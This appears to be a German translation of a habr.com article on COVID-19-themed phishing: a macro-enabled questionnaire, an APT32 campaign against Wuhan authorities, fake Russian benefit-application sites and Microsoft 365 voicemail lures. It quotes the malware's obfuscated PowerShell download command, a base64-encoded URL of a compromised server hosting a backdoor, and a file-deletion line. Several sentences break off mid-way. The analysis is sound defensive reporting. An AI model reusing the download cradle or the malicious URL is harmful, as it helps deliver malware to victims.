Angreifer machen sich das Thema COVID-19 weiterhin zunutze und stellen immer mehr Bedrohungen für Benutzer dar, die sich für alles rund um die Epidemie interessieren. IN
Denken Sie daran
Möchten Sie einen kostenlosen Test auf COVID-19?
Ein weiteres wichtiges Beispiel für Phishing mit Coronavirus-Thema war
Es war auch einfach, die meisten Benutzer davon zu überzeugen, Makros zu aktivieren. Dabei kam ein Standardtrick zum Einsatz: Um den Fragebogen auszufüllen, müssen Sie zunächst Makros aktivieren, also ein VBA-Skript ausführen.
Wie Sie sehen, ist das VBA-Skript speziell vor Antivirenprogrammen maskiert.
Windows verfügt über eine Wartefunktion, bei der die Anwendung /T <Sekunden> wartet, bevor sie die Standardantwort „Ja“ akzeptiert. In unserem Fall wartete das Skript 65 Sekunden, bevor es temporäre Dateien löschte:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Und während des Wartens wurde Malware heruntergeladen. Hierzu wurde ein spezielles PowerShell-Skript gestartet:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nach der Dekodierung des Base64-Werts lädt das PowerShell-Skript die Backdoor herunter, die sich auf dem zuvor gehackten Webserver aus Deutschland befindet:
http://automatischer-staubsauger.com/feature/777777.png
und speichert es unter dem Namen:
C:UsersPublictmpdirfile1.exe
Mappe ‘C:UsersPublictmpdir’
wird gelöscht, wenn die Datei „tmps1.bat“ ausgeführt wird, die den Befehl enthält cmd /c mkdir ""C:UsersPublictmpdir"".
Gezielter Angriff auf staatliche Stellen
Darüber hinaus berichteten FireEye-Analysten kürzlich über einen gezielten APT32-Angriff, der auf Regierungsstrukturen in Wuhan sowie auf das chinesische Ministerium für Notfallmanagement abzielte. Eines der verteilten RTFs enthielt einen Link zu einem Artikel der New York Times mit dem Titel
Interessanterweise hat laut Virustotal zum Zeitpunkt der Entdeckung keines der Antivirenprogramme diese Instanz erkannt.
Wenn offizielle Websites offline sind
Das auffälligste Beispiel eines Phishing-Angriffs ereignete sich neulich in Russland. Grund dafür war die Ernennung einer lang erwarteten Leistung für Kinder im Alter von 3 bis 16 Jahren. Als am 12. Mai 2020 der Beginn der Annahme von Anträgen bekannt gegeben wurde, strömten Millionen auf die Website des Staatsdienstes, um die lang erwartete Hilfe zu erhalten, und brachten das Portal nicht schlimmer zum Absturz als einen professionellen DDoS-Angriff. Als der Präsident sagte, dass „die Regierungsbehörden den Bewerbungsfluss nicht bewältigen könnten“, begann man online über die Einführung einer alternativen Website für die Annahme von Bewerbungen zu sprechen.
Das Problem besteht darin, dass mehrere Websites gleichzeitig ihre Arbeit aufgenommen haben, und während eine, die echte unter posobie16.gosuslugi.ru, tatsächlich Bewerbungen akzeptiert, sind es noch mehr
Kollegen von SearchInform haben etwa 30 neue betrügerische Domains in der .ru-Zone gefunden. Infosecurity und Softline Company haben seit Anfang April mehr als 70 ähnliche gefälschte Websites von Regierungsdiensten aufgespürt. Ihre Schöpfer manipulieren bekannte Symbole und verwenden auch Kombinationen der Wörter gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie und so weiter.
Hype und Social Engineering
All diese Beispiele bestätigen nur, dass es Angreifern gelingt, das Thema Coronavirus erfolgreich zu monetarisieren. Und je höher die sozialen Spannungen und je unklarer die Sachlage, desto größer sind die Chancen für Betrüger, wichtige Daten zu stehlen, Menschen dazu zu zwingen, ihr Geld aus eigener Tasche herauszugeben, oder einfach mehr Computer zu hacken.
Und da die Pandemie möglicherweise unvorbereitete Menschen dazu gezwungen hat, massenhaft von zu Hause aus zu arbeiten, sind nicht nur persönliche, sondern auch Unternehmensdaten gefährdet. Beispielsweise waren kürzlich auch Benutzer von Microsoft 365 (ehemals Office 365) einem Phishing-Angriff ausgesetzt. Die Menschen erhielten massenhaft „verpasste“ Sprachnachrichten als Anhänge zu Briefen. Bei den Dateien handelte es sich jedoch tatsächlich um eine HTML-Seite, zu der die Opfer des Angriffs weitergeleitet wurden
Source: habr.com